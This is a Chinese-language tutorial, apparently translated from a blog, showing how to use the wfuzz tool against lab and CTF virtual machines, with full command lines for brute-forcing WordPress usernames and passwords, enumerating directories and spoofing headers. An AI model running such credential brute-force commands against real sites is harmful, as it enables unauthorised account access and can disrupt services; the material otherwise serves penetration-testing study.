wfuzz——暴力破解web应用程序
我非常喜欢使用wfuzz,使用这个工具非常直观便捷,所以我就萌生了为这个整洁的小工具写一点基本用例的想法。
当你完成某一项工作时,有很多方法。Burp-suite pro有的功能和Hydra类似,并且还有很多其他的工具。他们都提供了类似的/更好/更差的性能和功能(实际情况实际分析)

让我们从头开始:
它可以作为默认的Kali Linux构建的一部分(我认为)。https://github.com/xmendez/wfuzz

用例一:爆破用户名和密码
回顾我以前的一些帖子,我发现下面的示例:

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic — hs Invalid -d “log=FUZZ&pwd=aaaaa” http://192.168.240.129/wp-login.php

-c:带颜色输出,这是个人选择。
-z:payload / wordlist - 您希望它使用的列表。
-hs:忽略包含无效的响应,在这个实例中,h是隐藏的,而s实际上是这个实例中的regex开关
-d:发送请求
FUZZ:fuzz的部分

说明:我已经确定在输入不正确的用户名时,在这个特定的WordPress安装上出现了一个包含“Invired”的响应,因此上面的字符串被用来将fsoc.dic文件的内容传递到请求的“FUZZ”部分。“FUZZ”变量是wfuzz识别从单词列表中插入单词的方式。然后我告诉它在哪里发送尝试。

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic — hs incorrect -d “log=eliott&pwd=FUZZ” http://192.168.240.129/wp-login.php

由于我在这两个部分中都使用了相同的单词列表,所以我可以在一个字符串中使用类似于下面的内容来完成此操作.

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic -z file,/root/Documents/MrRobot/fsoc.dic —hs Invalid —hs incorrect -d “log=FUZZ&pwd=FUZ2Z” http://192.168.240.129/wp-login.php

我定义了两个文件(-z文件),它们在我们的示例中是相同的,然后定义我不希望看到的两个响应,最后将FUZZ和FUZ2Z添加到POST请求中(如果您想强制使用多个值,可以使用FUZ3Z、FUZ4Z等)。在此阶段,指定文件的顺序非常重要。如果您使用一个用户名文件(FUZZ)和一个密码文件(FUZ2Z),则必须确保它们按此顺序显示。例如:

wfuzz.py -c -z file,users.txt -z file,pass.txt — sc 200 http://www.site.com/log.asp?user=FUZZ&pass=FUZ2Z

先指定Users.txt,然后指定pass.txt,然后查看POST请求,——这就是提交的顺序。
用例二:爆破目录

root@kali:~/necromancer# wfuzz -c -z file,/root/necromancer/thing.txt — hc 404 http://192.168.56.102/amagicbridgeappearsatthechasm/FUZZ

希望您能够简单地遵循用例1,如果您这样做的话,那么这个用例也应该是非常直截了当的。在这个例子中,我没有传递一个POST请求,我直接爆破,而忽略了作为404响应返回的任何东西。(hc =隐藏代码)
同样,如果我们希望在该过程中添加多个变量,与用户名完全相同,类似于以下内容:

root@kali:~/necromancer# wfuzz -c -z file,/root/necromancer/thing.txt -z file,/usr/share/wordlists/rockyou.txt — hc 404 http://192.168.56.102/amagicbridgeappearsatthechasm/FUZZ/FUZ2Z


在下一个示例中,我做了一件非常类似的事情,但是向它传递了-H参数,即

-H标头:使用标头
(ex:”Host:www.mysite.com,Cookie:id=1312321&user=FUZZ")

如果内存正确的话,这个VM/站点需要iphone才能访问。

wfuzz -c -z file,/usr/share/wordlists/rockyou.txt — hc 403,404 -H “User-Agent: Apple-iPhone5C3/” http://172.16.26.130:8008/NickIzL33t/FUZZ

记住:
爆破可能与DOS相似,你可能会影响系统服务,并且违反法律。

wfuzz是一个很棒的工具。寻找其他的工具无异于南辕北辙。

https://securitybytes.io/wfuzz-using-the-web-brute-forcer-1bf8890db2f

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖